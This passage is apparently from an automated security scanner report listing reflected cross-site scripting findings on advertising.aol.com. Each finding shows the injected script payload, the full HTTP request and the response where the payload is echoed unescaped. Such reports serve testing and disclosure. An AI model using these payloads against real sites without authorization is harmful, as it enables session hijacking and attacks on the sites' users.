Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bff5d"><script>alert(1)</script>de78e1ca44a/1/4/1/" />
...[SNIP]...

4.46. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b02af"-alert(1)-"4c30a13b2ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b02af"-alert(1)-"4c30a13b2ad/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b02af"-alert(1)-"4c30a13b2ad/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.47. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36906"><script>alert(1)</script>d283a00d3ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /36906"><script>alert(1)</script>d283a00d3ed/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/36906"><script>alert(1)</script>d283a00d3ed/2/4/1/" />
...[SNIP]...

4.48. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1c7f"-alert(1)-"eb2f998d238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b1c7f"-alert(1)-"eb2f998d238/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b1c7f"-alert(1)-"eb2f998d238/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.49. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b801f"><script>alert(1)</script>acc8dbf6e06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b801f"><script>alert(1)</script>acc8dbf6e06/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b801f"><script>alert(1)</script>acc8dbf6e06/3/4/1/" />
...[SNIP]...

4.50. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e341"-alert(1)-"e57ac4cfe09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1e341"-alert(1)-"e57ac4cfe09/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1e341"-alert(1)-"e57ac4cfe09/3/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.51. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a144a"-alert(1)-"ae544fdf52a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a144a"-alert(1)-"ae544fdf52a/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a144a"-alert(1)-"ae544fdf52a/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.52. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbabf"><script>alert(1)</script>320792b55e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bbabf"><script>alert(1)</script>320792b55e6/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bbabf"><script>alert(1)</script>320792b55e6/4/4/1/" />
...[SNIP]...

4.53. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ecd"><script>alert(1)</script>bbbae57115 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d3ecd"><script>alert(1)</script>bbbae57115/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/d3ecd"><script>alert(1)</script>bbbae57115/5/4/1/" />
...[SNIP]...

4.54. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2375"-alert(1)-"00b229b1262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e2375"-alert(1)-"00b229b1262/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2375"-alert(1)-"00b229b1262/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.55. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8368"><script>alert(1)</script>f05492a9878 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8368"><script>alert(1)</script>f05492a9878/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8368"><script>alert(1)</script>f05492a9878/6/4/1/" />
...[SNIP]...

4.56. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1111f"-alert(1)-"0965b770745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1111f"-alert(1)-"0965b770745/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1111f"-alert(1)-"0965b770745/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.57. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d8b9"-alert(1)-"6eecb609471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3d8b9"-alert(1)-"6eecb609471/7/4/1/ HTTP/1.1
Host: advertising.aol.com
